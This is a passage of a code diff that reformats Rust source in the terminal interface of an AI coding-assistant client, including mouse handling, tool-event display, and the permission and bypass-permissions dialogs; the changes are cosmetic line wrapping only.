                 MouseEventKind::ScrollDown => {
-                    if self.connect_dialog.visible { self.connect_dialog.move_down(); }
-                    else if self.command_palette.visible { self.command_palette.move_down(); }
+                    if self.connect_dialog.visible {
+                        self.connect_dialog.move_down();
+                    } else if self.command_palette.visible {
+                        self.command_palette.move_down();
+                    }
                 }
                 _ => {}
             }
@@ -4607,16 +5189,30 @@ impl App {
                 // Must replicate the same position clamping as the renderer.
                 if let Some(menu) = self.context_menu_state {
                     let items = Self::context_menu_items(menu.kind);
-                    let item_labels: Vec<&str> = items.iter().map(|i| match i {
-                        ContextMenuItem::Copy => "Copy",
-                        ContextMenuItem::Fork => "Fork new chat",
-                    }).collect();
-                    let menu_width = (item_labels.iter().map(|l| l.len()).max().unwrap_or(4) + 4) as u16;
+                    let item_labels: Vec<&str> = items
+                        .iter()
+                        .map(|i| match i {
+                            ContextMenuItem::Copy => "Copy",
+                            ContextMenuItem::Fork => "Fork new chat",
+                        })
+                        .collect();
+                    let menu_width =
+                        (item_labels.iter().map(|l| l.len()).max().unwrap_or(4) + 4) as u16;
                     let menu_height = items.len() as u16 + 2; // +2 for border
-                    // Clamp to screen bounds (same as render_context_menu)
+                                                              // Clamp to screen bounds (same as render_context_menu)
                     let screen = self.last_msg_area.get();
-                    let menu_x = menu.x.min(screen.x.saturating_add(screen.width).saturating_sub(menu_width + 1));
-                    let menu_y = menu.y.min(screen.y.saturating_add(screen.height).saturating_sub(menu_height + 1));
+                    let menu_x = menu.x.min(
+                        screen
+                            .x
+                            .saturating_add(screen.width)
+                            .saturating_sub(menu_width + 1),
+                    );
+                    let menu_y = menu.y.min(
+                        screen
+                            .y
+                            .saturating_add(screen.height)
+                            .saturating_sub(menu_height + 1),
+                    );
                     let col = mouse_event.column;
                     let row = mouse_event.row;
                     // Inner area starts 1 past the border
@@ -4628,7 +5224,8 @@ impl App {
                     {
                         let clicked_index = (row - inner_y) as usize;
                         if clicked_index < items.len() {
-                            self.context_menu_state.as_mut().unwrap().selected_index = clicked_index;
+                            self.context_menu_state.as_mut().unwrap().selected_index =
+                                clicked_index;
                             self.execute_context_menu_item();
                             return;
                         }
@@ -4641,13 +5238,15 @@ impl App {
                 let input_area = self.last_input_area.get();
                 let selectable_area = self.last_selectable_area.get();
 
-                let in_input = input_area.width > 0 && input_area.height > 0
+                let in_input = input_area.width > 0
+                    && input_area.height > 0
                     && mouse_event.row >= input_area.y
                     && mouse_event.row < input_area.y.saturating_add(input_area.height)
                     && mouse_event.column >= input_area.x
                     && mouse_event.column < input_area.x.saturating_add(input_area.width);
 
-                let in_selectable = selectable_area.width > 0 && selectable_area.height > 0
+                let in_selectable = selectable_area.width > 0
+                    && selectable_area.height > 0
                     && mouse_event.row >= selectable_area.y
                     && mouse_event.row < selectable_area.y.saturating_add(selectable_area.height)
                     && mouse_event.column >= selectable_area.x
@@ -4680,7 +5279,9 @@ impl App {
                             self.click_count = 0; // Reset for next click sequence
                         } else {
                             // Double-click: select word
-                            if let Some((start, end)) = self.find_word_boundaries(current_pos.0, current_pos.1) {
+                            if let Some((start, end)) =
+                                self.find_word_boundaries(current_pos.0, current_pos.1)
+                            {
                                 self.selection_anchor = Some((start, current_pos.1));
                                 self.selection_focus = Some((end, current_pos.1));
                             }
@@ -4709,12 +5310,18 @@ impl App {
                 if self.selection_anchor.is_some() {
                     let selectable_area = self.last_selectable_area.get();
                     if selectable_area.width > 0 && selectable_area.height > 0 {
-                        let clamped_col = mouse_event.column
-                            .max(selectable_area.x)
-                            .min(selectable_area.x.saturating_add(selectable_area.width).saturating_sub(1));
-                        let clamped_row = mouse_event.row
-                            .max(selectable_area.y)
-                            .min(selectable_area.y.saturating_add(selectable_area.height).saturating_sub(1));
+                        let clamped_col = mouse_event.column.max(selectable_area.x).min(
+                            selectable_area
+                                .x
+                                .saturating_add(selectable_area.width)
+                                .saturating_sub(1),
+                        );
+                        let clamped_row = mouse_event.row.max(selectable_area.y).min(
+                            selectable_area
+                                .y
+                                .saturating_add(selectable_area.height)
+                                .saturating_sub(1),
+                        );
                         self.selection_focus = Some((clamped_col, clamped_row));
                         self.click_count = 0; // Reset on drag to prevent further double-clicks
                     }
@@ -4795,7 +5402,11 @@ impl App {
                 }
             }
 
-            QueryEvent::ToolStart { tool_name, tool_id, input_json } => {
+            QueryEvent::ToolStart {
+                tool_name,
+                tool_id,
+                input_json,
+            } => {
                 if !self.is_streaming && self.spinner_verb.is_none() {
                     let seed = self.frame_count as usize ^ (self.messages.len() * 17);
                     self.spinner_verb = Some(sample_spinner_verb(seed).to_string());
@@ -4803,9 +5414,7 @@ impl App {
                 self.is_streaming = true;
                 self.status_message = Some(format!("Running {}…", tool_name));
                 let turn_index = self.current_user_turn_index();
-                if let Some(existing) =
-                    self.tool_use_blocks.iter_mut().find(|b| b.id == tool_id)
-                {
+                if let Some(existing) = self.tool_use_blocks.iter_mut().find(|b| b.id == tool_id) {
                     existing.turn_index = turn_index;
                     existing.status = ToolStatus::Running;
                     existing.output_preview = None;
@@ -4837,9 +5446,7 @@ impl App {
                 if remaining > 0 {
                     preview.push_str(&format!("\n\u{2026} {} more lines", remaining));
                 }
-                if let Some(block) =
-                    self.tool_use_blocks.iter_mut().find(|b| b.id == tool_id)
-                {
+                if let Some(block) = self.tool_use_blocks.iter_mut().find(|b| b.id == tool_id) {
                     block.status = if is_error {
                         ToolStatus::Error
                     } else {
@@ -4856,28 +5463,38 @@ impl App {
                 self.refresh_turn_diff_from_history();
             }
 
-            QueryEvent::TurnComplete { turn, stop_reason, usage, .. } => {
+            QueryEvent::TurnComplete {
+                turn,
+                stop_reason,
+                usage,
+                ..
+            } => {
                 debug!(turn, stop_reason, "Turn complete");
                 self.is_streaming = false;
                 self.spinner_verb = None;
 
                 // Update context window usage from the usage info.
                 if let Some(ref u) = usage {
-                    let turn_tokens = u.input_tokens + u.output_tokens
-                        + u.cache_creation_input_tokens + u.cache_read_input_tokens;
+                    let turn_tokens = u.input_tokens
+                        + u.output_tokens
+                        + u.cache_creation_input_tokens
+                        + u.cache_read_input_tokens;
                     self.context_used_tokens = self.context_used_tokens.saturating_add(turn_tokens);
                 }
                 // Record elapsed time and pick a completion verb
                 let seed = self.frame_count as usize ^ (self.messages.len() * 7);
-                let elapsed = self.turn_start.take()
+                let elapsed = self
+                    .turn_start
+                    .take()
                     .map(|start| format_elapsed_ms(start.elapsed().as_millis()));
-                self.last_turn_elapsed = Some(
-                    elapsed.unwrap_or_else(|| "0s".to_string())
-                );
+                self.last_turn_elapsed = Some(elapsed.unwrap_or_else(|| "0s".to_string()));
                 self.last_turn_verb = Some(sample_completion_verb(seed));
                 self.flush_streamed_assistant_message();
-                self.tool_use_blocks.retain(|b| b.status != ToolStatus::Running);
-                self.complete_current_turn_snapshot(stop_reason.contains("abort") || stop_reason.contains("cancel"));
+                self.tool_use_blocks
+                    .retain(|b| b.status != ToolStatus::Running);
+                self.complete_current_turn_snapshot(
+                    stop_reason.contains("abort") || stop_reason.contains("cancel"),
+                );
                 self.invalidate_transcript();
                 self.refresh_turn_diff_from_history();
             }
@@ -4910,7 +5527,10 @@ impl App {
                         self.token_warning_threshold_shown = 80;
                         self.notifications.push(
                             NotificationKind::Warning,
-                            format!("Context window {:.0}% full. Consider /compact.", pct_used * 100.0),
+                            format!(
+                                "Context window {:.0}% full. Consider /compact.",
+                                pct_used * 100.0
+                            ),
                             Some(30),
                         );
                     }
@@ -4918,7 +5538,10 @@ impl App {
                         self.token_warning_threshold_shown = 95;
                         self.notifications.push(
                             NotificationKind::Error,
-                            format!("Context window {:.0}% full! Run /compact now.", pct_used * 100.0),
+                            format!(
+                                "Context window {:.0}% full! Run /compact now.",
+                                pct_used * 100.0
+                            ),
                             None,
                         );
                     }
@@ -4974,8 +5597,7 @@ impl App {
                         }
                         self.model_fetch_rx = None;
                     }
-                    Ok(Err(()))
-                    | Err(tokio::sync::mpsc::error::TryRecvError::Disconnected) => {
+                    Ok(Err(())) | Err(tokio::sync::mpsc::error::TryRecvError::Disconnected) => {
                         self.model_picker.loading_models = false;
                         self.model_fetch_rx = None;
                     }
@@ -4986,7 +5608,11 @@ impl App {
             // Spawn async provider model-list fetch when requested.
             if self.model_picker_fetch_pending {
                 self.model_picker_fetch_pending = false;
-                let provider_id_str = self.config.provider.clone().unwrap_or_else(|| "anthropic".to_string());
+                let provider_id_str = self
+                    .config
+                    .provider
+                    .clone()
+                    .unwrap_or_else(|| "anthropic".to_string());
                 if let Some(ref registry) = self.provider_registry {
                     let pid = claurst_core::ProviderId::new(&provider_id_str);
                     if let Some(provider) = registry.get(&pid) {
@@ -5045,8 +5671,7 @@ impl App {
                     let entries: Vec<crate::session_browser::SessionEntry> = sessions
                         .into_iter()
                         .map(|s| {
-                            let age = chrono::Utc::now()
-                                .signed_duration_since(s.updated_at);
+                            let age = chrono::Utc::now().signed_duration_since(s.updated_at);
                             let last_updated = if age.num_minutes() < 1 {
                                 "just now".to_string()
                             } else if age.num_hours() < 1 {
@@ -5085,13 +5710,13 @@ impl App {
                     match ev {
                         VoiceEvent::RecordingStarted => {
                             self.voice_recording = true;
-                            self.status_message =
-                                Some("Recording\u{2026} press V again or Enter to stop".to_string());
+                            self.status_message = Some(
+                                "Recording\u{2026} press V again or Enter to stop".to_string(),
+                            );
                         }
                         VoiceEvent::RecordingStopped => {
                             self.voice_recording = false;
-                            self.status_message =
-                                Some("Transcribing\u{2026}".to_string());
+                            self.status_message = Some("Transcribing\u{2026}".to_string());
                         }
                         VoiceEvent::TranscriptReady(text) => {
                             if !text.is_empty() {
@@ -5104,9 +5729,8 @@ impl App {
                                 }
                                 self.prompt_input.paste(&text);
                                 self.refresh_prompt_input();
-                                self.status_message = Some(
-                                    format!("Transcribed: {}", &text[..text.len().min(60)])
-                                );
+                                self.status_message =
+                                    Some(format!("Transcribed: {}", &text[..text.len().min(60)]));
                             }
                             // Clear the channel once we have the result.
                             self.voice_event_rx = None;
@@ -5211,9 +5835,9 @@ impl App {
             let content = msg.get_all_text().to_lowercase();
 
             // Check if message contains error keywords
-            let has_error = ERROR_KEYWORDS.iter().any(|keyword| {
-                content.contains(keyword)
-            });
+            let has_error = ERROR_KEYWORDS
+                .iter()
+                .any(|keyword| content.contains(keyword));
 
             if has_error && i > (self.messages.len().saturating_sub(self.scroll_offset / 2)) {
                 // Found an error message, scroll to it
@@ -5239,9 +5863,9 @@ impl App {
             let content = msg.get_all_text().to_lowercase();
 
             // Check if message contains error keywords
-            let has_error = ERROR_KEYWORDS.iter().any(|keyword| {
-                content.contains(keyword)
-            });
+            let has_error = ERROR_KEYWORDS
+                .iter()
+                .any(|keyword| content.contains(keyword));
 
             if has_error && i < (self.messages.len().saturating_sub(self.scroll_offset / 2)) {
                 // Found an error message, scroll to it

--- a/src-rust/crates/tui/src/bridge_state.rs
+++ b/src-rust/crates/tui/src/bridge_state.rs
@@ -41,7 +41,11 @@ impl BridgeConnectionState {
 
             BridgeConnectionState::Connected { peer_count, .. } => {
                 let label = if *peer_count > 0 {
-                    format!(" REMOTE ({} peer{}) ", peer_count, if *peer_count == 1 { "" } else { "s" })
+                    format!(
+                        " REMOTE ({} peer{}) ",
+                        peer_count,
+                        if *peer_count == 1 { "" } else { "s" }
+                    )
                 } else {
                     " REMOTE ".to_string()
                 };
@@ -101,7 +105,9 @@ mod tests {
 
     #[test]
     fn disconnected_produces_no_badge() {
-        assert!(BridgeConnectionState::Disconnected.status_badge(0).is_none());
+        assert!(BridgeConnectionState::Disconnected
+            .status_badge(0)
+            .is_none());
     }
 
     #[test]

--- a/src-rust/crates/tui/src/bypass_permissions_dialog.rs
+++ b/src-rust/crates/tui/src/bypass_permissions_dialog.rs
@@ -94,7 +94,9 @@ pub fn render_bypass_permissions_dialog(
     // Body text (matches TS dialog copy)
     lines.push(Line::from(vec![Span::styled(
         "Claurst running in Bypass Permissions mode",
-        Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::Yellow)
+            .add_modifier(Modifier::BOLD),
     )]));
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
@@ -132,12 +134,16 @@ pub fn render_bypass_permissions_dialog(
 
     // Options
     let opt_no_style = if state.selected == 0 {
-        Style::default().fg(Color::White).add_modifier(Modifier::BOLD | Modifier::REVERSED)
+        Style::default()
+            .fg(Color::White)
+            .add_modifier(Modifier::BOLD | Modifier::REVERSED)
     } else {
         Style::default().fg(Color::White)
     };
     let opt_yes_style = if state.selected == 1 {
-        Style::default().fg(Color::Red).add_modifier(Modifier::BOLD | Modifier::REVERSED)
+        Style::default()
+            .fg(Color::Red)
+            .add_modifier(Modifier::BOLD | Modifier::REVERSED)
     } else {
         Style::default().fg(Color::Red)
     };
@@ -152,7 +158,9 @@ pub fn render_bypass_permissions_dialog(
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
         "  ↑↓ or 1/2 to select  ·  Enter to confirm",
-        Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::ITALIC),
     )]));
 
     Paragraph::new(lines)
@@ -219,12 +227,16 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 30)).unwrap();
         let mut state = BypassPermissionsDialogState::new();
         state.show();
-        terminal.draw(|frame| {
-            let area = frame.area();
-            render_bypass_permissions_dialog(frame, &state, area);
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                let area = frame.area();
+                render_bypass_permissions_dialog(frame, &state, area);
+            })
+            .unwrap();
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter()
+        let content: String = buf
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("WARNING") || content.contains("Bypass"));
@@ -235,10 +247,17 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 30)).unwrap();
         let mut state = BypassPermissionsDialogState::new();
         state.show();
-        terminal.draw(|frame| {
-            render_bypass_permissions_dialog(frame, &state, frame.area());
-        }).unwrap();
-        let content: String = terminal.backend().buffer().clone().content().iter()
+        terminal
+            .draw(|frame| {
+                render_bypass_permissions_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
+        let content: String = terminal
+            .backend()
+            .buffer()
+            .clone()
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("No") || content.contains("exit"));
@@ -250,9 +269,11 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(80, 24)).unwrap();
         let state = BypassPermissionsDialogState::new(); // visible = false
         let before = terminal.backend().buffer().clone();
-        terminal.draw(|frame| {
-            render_bypass_permissions_dialog(frame, &state, frame.area());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_bypass_permissions_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
         assert_eq!(terminal.backend().buffer().content(), before.content());
     }
 }

--- a/src-rust/crates/tui/src/context_viz.rs
+++ b/src-rust/crates/tui/src/context_viz.rs
@@ -91,7 +91,9 @@ pub fn render_context_viz(
     // -- Context window ----------------------------------------------------------
     lines.push(Line::from(vec![Span::styled(
         " Context window",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )]));
 
     let filled = ((ctx_pct * bar_width as f32) as usize).min(bar_width);
@@ -101,7 +103,8 @@ pub fn render_context_viz(
         Span::styled("\u{2588}".repeat(filled), Style::default().fg(ctx_color)),
         Span::styled("\u{2591}".repeat(empty), Style::default().fg(CLAURST_MUTED)),
         Span::styled(
-            format!("]  {:.0}%  ({} / {})",
+            format!(
+                "]  {:.0}%  ({} / {})",
                 ctx_pct * 100.0,
                 format_tokens(context_used),
                 format_tokens(context_total),
@@ -115,7 +118,9 @@ pub fn render_context_viz(
     // -- Rate limits -------------------------------------------------------------
     lines.push(Line::from(vec![Span::styled(
         " Rate limits",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )]));
 
     for (label, pct_opt) in &[(" 5-hour ", rate_5h), (" 7-day  ", rate_7d)] {
@@ -136,10 +141,7 @@ pub fn render_context_viz(
                     Span::styled("  [", Style::default().fg(CLAURST_MUTED)),
                     Span::styled("\u{2588}".repeat(f), Style::default().fg(color)),
                     Span::styled("\u{2591}".repeat(e), Style::default().fg(CLAURST_MUTED)),
-                    Span::styled(
-                        format!("]  {:.0}%", p * 100.0),
-                        Style::default().fg(color),
-                    ),
+                    Span::styled(format!("]  {:.0}%", p * 100.0), Style::default().fg(color)),
                 ]));
             }
             None => {
@@ -158,7 +160,9 @@ pub fn render_context_viz(
         Span::styled(" Session cost:  ", Style::default().fg(Color::White)),
         Span::styled(
             format!("${:.4}", cost_usd),
-            Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
         ),
     ]));
 
@@ -169,7 +173,9 @@ pub fn render_context_viz(
     frame.render_widget(
         Paragraph::new(Line::from(vec![Span::styled(
             " enter/esc close",
-            Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(CLAURST_MUTED)
+                .add_modifier(Modifier::ITALIC),
         )])),
         layout.footer_area,
     );
@@ -215,10 +221,26 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 30)).unwrap();
         let mut state = ContextVizState::new();
         state.open();
-        terminal.draw(|frame| {
-            render_context_viz(frame, &state, frame.area(), 50_000, 200_000, Some(0.3), Some(0.1), 0.42);
-        }).unwrap();
-        let content: String = terminal.backend().buffer().clone().content().iter()
+        terminal
+            .draw(|frame| {
+                render_context_viz(
+                    frame,
+                    &state,
+                    frame.area(),
+                    50_000,
+                    200_000,
+                    Some(0.3),
+                    Some(0.1),
+                    0.42,
+                );
+            })
+            .unwrap();
+        let content: String = terminal
+            .backend()
+            .buffer()
+            .clone()
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("Context") || content.contains("Rate"));
@@ -229,9 +251,11 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(80, 24)).unwrap();
         let state = ContextVizState::new();
         let before = terminal.backend().buffer().clone();
-        terminal.draw(|frame| {
-            render_context_viz(frame, &state, frame.area(), 0, 0, None, None, 0.0);
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_context_viz(frame, &state, frame.area(), 0, 0, None, None, 0.0);
+            })
+            .unwrap();
         assert_eq!(terminal.backend().buffer().content(), before.content());
     }
 }

--- a/src-rust/crates/tui/src/desktop_upsell_startup.rs
+++ b/src-rust/crates/tui/src/desktop_upsell_startup.rs
@@ -23,8 +23,7 @@ use ratatui::widgets::{Block, Borders, Clear, Paragraph, Widget};
 
 /// Returns true when Claurst Desktop is a supported platform option.
 pub fn is_desktop_supported_platform() -> bool {
-    cfg!(target_os = "macos")
-        || (cfg!(target_os = "windows") && cfg!(target_arch = "x86_64"))
+    cfg!(target_os = "macos") || (cfg!(target_os = "windows") && cfg!(target_arch = "x86_64"))
 }
 
 // ---------------------------------------------------------------------------
@@ -123,7 +122,11 @@ impl DesktopUpsellStartupState {
 
     /// Height the dialog occupies (0 if not visible).
     pub fn height(&self) -> u16 {
-        if self.visible { 12 } else { 0 }
+        if self.visible {
+            12
+        } else {
+            0
+        }
     }
 }
 
@@ -145,7 +148,12 @@ pub fn render_desktop_upsell_startup(
     let dialog_h = 12u16.min(area.height.saturating_sub(2));
     let x = area.x + (area.width.saturating_sub(dialog_w)) / 2;
     let y = area.y + (area.height.saturating_sub(dialog_h)) / 2;
-    let dialog_area = Rect { x, y, width: dialog_w, height: dialog_h };
+    let dialog_area = Rect {
+        x,
+        y,
+        width: dialog_w,
+        height: dialog_h,
+    };
 
     Clear.render(dialog_area, buf);
 
@@ -292,20 +300,40 @@ mod tests {
     fn desktop_upsell_render_smoke() {
         let mut state = DesktopUpsellStartupState::new();
         state.visible = true;
-        let area = Rect { x: 0, y: 0, width: 80, height: 24 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 24,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_desktop_upsell_startup(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(rendered.contains("Claurst Code Desktop") || rendered.contains("visual diffs"));
     }
 
     #[test]
     fn desktop_upsell_not_rendered_when_invisible() {
         let state = DesktopUpsellStartupState::new();
-        let area = Rect { x: 0, y: 0, width: 80, height: 24 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 24,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_desktop_upsell_startup(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(!rendered.contains("visual diffs"));
     }
 }

--- a/src-rust/crates/tui/src/device_auth_dialog.rs
+++ b/src-rust/crates/tui/src/device_auth_dialog.rs
@@ -140,11 +140,7 @@ pub enum DeviceAuthEvent {
 
 /// Render the device auth dialog overlay — OpenCode-style: dark overlay, no
 /// border, minimal and polished.
-pub fn render_device_auth_dialog(
-    frame: &mut Frame,
-    state: &DeviceAuthDialogState,
-    area: Rect,
-) {
+pub fn render_device_auth_dialog(frame: &mut Frame, state: &DeviceAuthDialogState, area: Rect) {
     if !state.visible {
         return;
     }
@@ -221,9 +217,7 @@ pub fn render_device_auth_dialog(
                 Span::styled(" at ", Style::default().fg(dim)),
                 Span::styled(
                     state.verification_uri.clone(),
-                    Style::default()
-                        .fg(pink)
-                        .add_modifier(Modifier::UNDERLINED),
+                    Style::default().fg(pink).add_modifier(Modifier::UNDERLINED),
                 ),
             ]));
             lines.push(Line::from(""));
@@ -252,9 +246,7 @@ pub fn render_device_auth_dialog(
             lines.push(Line::from(""));
             lines.push(Line::from(Span::styled(
                 " \u{2714} Connected successfully!",
-                Style::default()
-                    .fg(green)
-                    .add_modifier(Modifier::BOLD),
+                Style::default().fg(green).add_modifier(Modifier::BOLD),
             )));
             lines.push(Line::from(""));
             lines.push(Line::from(Span::styled(

--- a/src-rust/crates/tui/src/dialog_select.rs
+++ b/src-rust/crates/tui/src/dialog_select.rs
@@ -103,9 +103,8 @@ impl DialogSelectState {
     }
 
     pub fn page_down(&mut self) {
-        self.selected_index = (self.selected_index + 10).min(
-            self.filtered_indices.len().saturating_sub(1),
-        );
+        self.selected_index =
+            (self.selected_index + 10).min(self.filtered_indices.len().saturating_sub(1));
     }
 
     pub fn move_home(&mut self) {
@@ -190,11 +189,7 @@ impl DialogSelectState {
 
 /// Render the DialogSelect overlay — OpenCode-style: dark overlay, no border,
 /// full-width highlight bar on selected item, minimal and polished.
-pub fn render_dialog_select(
-    frame: &mut Frame,
-    state: &DialogSelectState,
-    area: Rect,
-) {
+pub fn render_dialog_select(frame: &mut Frame, state: &DialogSelectState, area: Rect) {
     if !state.visible {
         return;
     }
@@ -224,7 +219,9 @@ pub fn render_dialog_select(
             }
         }
         sections
-    } else { 0 };
+    } else {
+        0
+    };
     let content_height = 3 + item_lines + category_count * 2; // search + blank + items + cat headers + gaps
     let height = content_height.min(max_height).max(8);
     let dialog_area = centered_rect(width, height, area);
@@ -263,7 +260,9 @@ pub fn render_dialog_select(
     header_lines.push(Line::from(vec![
         Span::styled(
             format!(" {}", state.title),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("{:>width$}", "esc ", width = title_pad),
@@ -273,7 +272,12 @@ pub fn render_dialog_select(
 
     // Search field
     header_lines.push(Line::from(""));
-    header_lines.push(modal_search_line(&state.filter, "Search", dim, Color::White));
+    header_lines.push(modal_search_line(
+        &state.filter,
+        "Search",
+        dim,
+        Color::White,
+    ));
 
     frame.render_widget(Paragraph::new(header_lines).bg(dialog_bg), header_area);
 
@@ -293,10 +297,13 @@ pub fn render_dialog_select(
 
         // Category header (only when not filtering)
         if item.category != last_category && state.filter.is_empty() {
-            lines.push(Line::from("")); current_line += 1;
+            lines.push(Line::from(""));
+            current_line += 1;
             lines.push(Line::from(vec![Span::styled(
                 format!(" {}", item.category),
-                Style::default().fg(category_fg).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(category_fg)
+                    .add_modifier(Modifier::BOLD),
             )]));
             current_line += 1;
             last_category = item.category.clone();
@@ -318,21 +325,28 @@ pub fn render_dialog_select(
         if !item.description.is_empty() {
             spans.push(Span::styled(
                 format!(" {}", item.description),
-                Style::default().fg(if is_selected { Color::Rgb(200, 200, 200) } else { dim }).bg(item_bg),
+                Style::default()
+                    .fg(if is_selected {
+                        Color::Rgb(200, 200, 200)
+                    } else {
+                        dim
+                    })
+                    .bg(item_bg),
             ));
         }
 
         let badge_text = item.badge.clone().unwrap_or_default();
         let text_len: usize = spans.iter().map(|s| s.content.len()).sum();
-        let badge_len = if badge_text.is_empty() { 0 } else { badge_text.len() + 1 };
+        let badge_len = if badge_text.is_empty() {
+            0
+        } else {
+            badge_text.len() + 1
+        };
         let pad = inner
             .width
             .saturating_sub(text_len as u16 + badge_len as u16) as usize;
         if pad > 0 {
-            spans.push(Span::styled(
-                " ".repeat(pad),
-                Style::default().bg(item_bg),
-            ));
+            spans.push(Span::styled(" ".repeat(pad), Style::default().bg(item_bg)));
         }
         if !badge_text.is_empty() {
             spans.push(Span::styled(
@@ -378,7 +392,9 @@ pub fn render_dialog_select(
         .into_iter()
         .filter_map(|(row, idx)| {
             let screen_row = row.saturating_sub(scroll_y);
-            if screen_row >= body_area.y && screen_row < body_area.y.saturating_add(body_area.height) {
+            if screen_row >= body_area.y
+                && screen_row < body_area.y.saturating_add(body_area.height)
+            {
                 Some((screen_row, idx))
             } else {
                 None
@@ -386,9 +402,7 @@ pub fn render_dialog_select(
         })
         .collect();
 
-    let para = Paragraph::new(lines)
-        .bg(dialog_bg)
-        .scroll((scroll_y, 0));
+    let para = Paragraph::new(lines).bg(dialog_bg).scroll((scroll_y, 0));
     frame.render_widget(para, body_area);
 }
 

--- a/src-rust/crates/tui/src/dialogs.rs
+++ b/src-rust/crates/tui/src/dialogs.rs
@@ -151,12 +151,7 @@ impl PermissionRequest {
     }
 
     /// Build a FileRead-specific dialog (3 options: once / session / deny).
-    pub fn file_read(
-        tool_use_id: String,
-        tool_name: String,
-        reason: String,
-        path: String,
-    ) -> Self {
+    pub fn file_read(tool_use_id: String, tool_name: String, reason: String, path: String) -> Self {
         let (description, danger_explanation) = if let Some(nl) = reason.find('\n') {
             (reason[..nl].to_string(), reason[nl + 1..].to_string())
         } else {
@@ -213,10 +208,22 @@ impl PermissionRequest {
     /// The four canonical options (matches TS interactive permission dialog).
     pub fn default_options() -> Vec<PermissionOption> {
         vec![
-            PermissionOption { label: "Yes, allow once".to_string(), key: 'y' },
-            PermissionOption { label: "Yes, allow this session".to_string(), key: 'Y' },
-            PermissionOption { label: "Yes, always allow (persistent)".to_string(), key: 'p' },
-            PermissionOption { label: "No, deny".to_string(), key: 'n' },
+            PermissionOption {
+                label: "Yes, allow once".to_string(),
+                key: 'y',
+            },
+            PermissionOption {
+                label: "Yes, allow this session".to_string(),
+                key: 'Y',
+            },
+            PermissionOption {
+                label: "Yes, always allow (persistent)".to_string(),
+                key: 'p',
+            },
+            PermissionOption {
+                label: "No, deny".to_string(),
+                key: 'n',
+            },
         ]
     }
 
@@ -238,19 +245,40 @@ impl PermissionRequest {
     /// FileRead options (3): once / session / deny.
     pub fn file_read_options() -> Vec<PermissionOption> {
         vec![
-            PermissionOption { label: "Yes, allow once".to_string(), key: 'y' },
-            PermissionOption { label: "Yes, allow this session".to_string(), key: 'Y' },
-            PermissionOption { label: "No, deny".to_string(), key: 'n' },
+            PermissionOption {
+                label: "Yes, allow once".to_string(),
+                key: 'y',
+            },
+            PermissionOption {
+                label: "Yes, allow this session".to_string(),
+                key: 'Y',
+            },
+            PermissionOption {
+                label: "No, deny".to_string(),
+                key: 'n',
+            },
         ]
     }
 
     /// FileWrite options (4): once / session / project / deny.
     pub fn file_write_options() -> Vec<PermissionOption> {
         vec![
-            PermissionOption { label: "Yes, allow once".to_string(), key: 'y' },
-            PermissionOption { label: "Yes, allow this session".to_string(), key: 'Y' },
-            PermissionOption { label: "Yes, always allow for this project".to_string(), key: 'p' },
-            PermissionOption { label: "No, deny".to_string(), key: 'n' },
+            PermissionOption {
+                label: "Yes, allow once".to_string(),
+                key: 'y',
+            },
+            PermissionOption {
+                label: "Yes, allow this session".to_string(),
+                key: 'Y',
+            },
+            PermissionOption {
+                label: "Yes, always allow for this project".to_string(),
+                key: 'p',
+            },
+            PermissionOption {
+                label: "No, deny".to_string(),
+                key: 'n',
+            },
         ]
     }
 }
@@ -376,7 +404,11 @@ pub fn render_permission_dialog(frame: &mut Frame, pr: &PermissionRequest, area:
     let preview_line_count: u16 = match &pr.kind {
         PermissionDialogKind::Bash { .. } => 0, // rendered separately as bash_command_lines
         _ => {
-            if pr.input_preview.is_some() { 3 } else { 0 }
+            if pr.input_preview.is_some() {
+                3
+            } else {
+                0
+            }
         }
     };
 
